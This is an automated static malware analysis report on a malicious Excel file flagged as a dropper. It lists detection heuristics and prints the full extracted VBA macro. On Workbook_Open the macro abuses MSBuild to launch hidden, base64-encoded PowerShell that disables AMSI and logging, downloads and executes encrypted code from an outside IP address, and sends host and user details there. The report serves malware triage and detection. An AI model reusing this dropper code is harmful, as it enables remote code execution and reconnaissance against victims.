Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1d3892599165fe64…

MALICIOUS

Office (OOXML)

24.5 KB Created: 2019-08-21 09:57:13 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-05-14
MD5: 25d6e0a4127e0868a44e8ec089857b3d SHA-1: 86978cb9a043019c520b1f400bc570d7bbc34c46 SHA-256: 1d3892599165fe640e91ee3b1693b1dd9dfab4bb16d30a6335e176a51f94f7af
372 Risk Score

Heuristics 10

  • ClamAV: Xls.Dropper.Agent-7132023-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7132023-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set objShell = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set objShell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/developer/msbuild/2003 In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8595 bytes
SHA-256: 2f40ef2e16c1a57241248287ee297a5a6acc59c31cca184bfc058b3598b616b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
#If VBA7 Then
    Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
 #Else
    Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
    
Sub mksrw()
Set objShell = CreateObject("WScript.Shell")

Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim StrFldSearch
StrFldSearch = "C:\Windows\Microsoft.NET\Framework64"
Set RootFolder = oFSO.GetFolder(StrFldSearch)
Set SubFolder = RootFolder.SubFolders

Dim np
For Each folder In SubFolder
strFolder = StrFldSearch & "\" & folder.Name & "\MSBuild.exe"
If oFSO.FileExists(strFolder) Then
np = StrFldSearch & "\" & folder.Name & "\"
End If
Next

Dim fp
fp = objShell.ExpandEnvironmentStrings("%TMP%\tfi.xml")

Dim b1, b2, b3, b4, b5
b1 = "SQBmACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBlAFIAUwBJAG8ATgAuAE0AYQBKAE8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAGwAeQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAEEAbABVAGUAKAAkAE4AVQBMAEwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBj"
b2 = "AGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8AbABsAEUAQwBUAGkAbwBuAFMALgBHAEUATgBlAHIASQBjAC4ARABpAGMAVABJAG8AbgBhAHIAWQBbAFMAVAByAEkATgBHACwAUwBZAFMAdABFAG0ALgBPAGIASgBlAGMAdABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAVgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEAbAB9AEUATABTAGUAewBbAFMAYwBSAEkAcAB0AEIAbABvAEMAawBdAC4AIgBHAEUAdABGAEkAZQBgAGwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAEwAdQBFACgAJABOAHUA"
b3 = "TABsACwAKABOAGUAdwAtAE8AQgBqAEUAYwB0ACAAQwBPAEwATABlAEMAVABJAE8AbgBzAC4ARwBFAE4ARQBSAGkAYwAuAEgAQQBzAEgAUwBFAFQAWwBzAFQAcgBpAG4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAEUATQBiAEwAWQAuAEcAZQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAFQARgBJAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEAbAB1AEUAKAAkAG4AdQBsAGwALAAkAFQAcgB1AGUAKQB9ADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAdAAuAFMAZQBSAHYAaQBDAEUAUABPAGkAbgBUAE0AYQBOAEEAZwBlAFIAXQA6ADoARQBYAHAARQBjAHQAMQAwADAAQwBvAG4AVABJAE4AVQBFAD0AMAA7ACQAdwBDAD0ATgBlAFcALQBPAGIASgBFAEMAVAAgAFMAeQBTAFQARQBtAC4ATgBFAFQALgBXAGUAQgBDAEwASQBlAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBl"
b4 = "ACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBhAGQAZQByAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAUgBPAFgAWQA9AFsAUwBZAFMAdABFAE0ALgBOAEUAdAAuAFcARQBCAFIARQBxAFUARQBTAFQAXQA6ADoARABFAGYAYQBVAGwAVABXAEUAQgBQAHIAbwBYAFkAOwAkAFcAQwAuAFAAcgBvAHgAWQAuAEMAUgBlAEQARQBOAHQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQARQBtAC4ATgBFAHQALgBDAFIAZQBkAGUATgB0AEkAYQBMAEMAQQBjAEgARQBdADoAOgBEAEUARgBBAFUAbABUAE4ARQB0AHcAbwBSAGsAQwByAEUARABlAG4AVABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBuAEMAbwBEAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAcwAoACcAZAA2ADgAYQBiAGQANQA4ADEAMwA5ADcAZQBlADMAMgA3ADgAOAAyADEAOABmAGEANwAzADgAZAA3AGUAYwAwACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMA"
b5 = "WwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8ANQA0AC4AMwA3AC4AMQAzADYALgAyADEAMQA6ADQANAAzACcAOwAkAHQAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkAHcAYwAuAEgARQBBAGQAZQByAFMALgBBAEQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHYAcABBAG8ATABrAG0AcQA0AHMAawArAG4AaABEAGEASQBCAGkAcgBCAGEAdQBuAHoAYwBJAD0AIgApADsAJABEAEEAVABhAD0AJABXAEMALgBEAE8AVwBOAGwATwBhAEQARABhAFQAYQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAGEAdABBAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEAdABBAC4AbABlAG4AZwBUAEgAXQA7AC0AagBvAGkATgBbAEMASABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA="

Set fl = CreateObject("Scripting.FileSystemObject")
Set File = fl.CreateTextFile(fp, True)

Dim c1
c1 = "JABlAD0AIgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQA9ACIAKwAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAKwAiAGAAIgAmAGAAIgBIAE8ATQBFAFAAQQBUAEgAPQAiACsAJABlAG4AdgA6AEgATwBNAEUAUABBAFQASAArACIAYAAiACYAYAAiAEwATwBHAE8ATgBTAEUAUgBWAEUAUgA9ACIAKwAkAGUAbgB2ADoATABPAEcATwBOAFMARQBSAFYARQBSACsAIgBgACIAJgBgACIATwBTAD0AIgArACQAZQBuAHYAOgBPAFMAKwAiAGAAIgAmAGAAIgBVAFMARQBSAEQATgBTAEQATwBNAEEASQBOAD0AIgArACQAZQBuAHYAOgBVAFMARQBSAEQATgBTAEQATwBNAEEASQBOACsAIgBgACIAJgBgACIAVQBTAEUAUgBEAE8ATQBBAEkATgA9ACIAKwAkAGUAbgB2ADoAVQBTAEUAUgBEAE8ATQBBAEkATgArACIAYAAiACYAYAAiAFUAUwBFAFIATgBBAE0ARQA9ACIAKwAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAoACIAaAB0AHQAcAA6AC8ALwA1ADQALgAzADcALgAxADMANgAuADIAMQAxAC8AbQBhAHIAawBlAHIALgBoAHQAbQBsAD8AIgArACQAZQApAA=="

Dim a1, a2, a3, a4
a1 = "<Project ToolsVersion=""4.0"" xmlns=""http://schemas.microsoft.com/developer/msbuild/2003""><Target Name=""34rfas""><QWEridxnaPO /></Target><UsingTask TaskName=""QWEridxnaPO"" TaskFactory=""CodeTaskFactory"" AssemblyFile=""C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"" ><Task><Reference Include=""System.Management.Automation"" /><Code Type=""Class"" Language=""cs""><![CDATA[ using System;using System.IO;using System.Diagnostics;using System.Reflection;using System.Runtime.InteropServices;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Text;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class QWEridxnaPO :  Task, ITask {public override bool Execute() {"
a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
a3 = "ProcessStartInfo startInfo = new ProcessStartInfo(""powershell.exe"");startInfo.WindowStyle = ProcessWindowStyle.Minimized;startInfo.Arguments = ""-noP -sta -w 1 -enc " & b1 & b2 & b3 & b4 & b5 & """;Process.Start(startInfo);"
a4 = "return true;}}]]></Code></Task></UsingTask></Project>"

File.Write a1 & a2 & a3 & a4

File.Close

objShell.Run (np & "MSBuild.exe" & " " & fp)
Sleep (2000)

fl.DeleteFile (fp)

End Sub



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
mksrw
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 28672 bytes
SHA-256: 1717dbde530376e4acc9427bc3e26dbc81015c6c881befe4fca1667452f55675
Detection
ClamAV: Xls.Dropper.Agent-7132023-0
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).